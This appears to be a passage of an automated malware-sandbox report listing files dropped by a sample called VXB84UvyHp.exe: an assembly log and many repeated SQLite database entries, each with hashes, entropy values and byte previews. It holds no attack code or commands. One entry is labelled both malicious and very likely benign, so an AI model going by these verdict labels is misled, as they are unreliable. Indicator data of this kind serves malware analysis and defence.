                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2666
                                                                                                                Entropy (8bit):5.345804351520589
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHt1qHxLHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JNV
                                                                                                                MD5:90757169D333CB9247B01FB0CAF14023
                                                                                                                SHA1:C47A0AA0CBC960527EA4FA7F61AC1D08B56C23A5
                                                                                                                SHA-256:C04472992BF7CF58327D947D334F1105C14C5CF0D2DD0DF7E7873CAADE0EC61D
                                                                                                                SHA-512:A49B90272EC353DE49C508AF75C509D14A18EA50ABD1CD49BF5313A708CB9654A543E3340C74978B5756A66EF291132E93931853CAD7CC8C85450BB64A318031
                                                                                                                Malicious:true
                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):49152
                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                Malicious:false
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):49152
                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                Malicious:false
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):49152
                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                Malicious:false
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):40960
                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):40960
                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):40960
                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):40960
                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):40960
                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):40960
                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
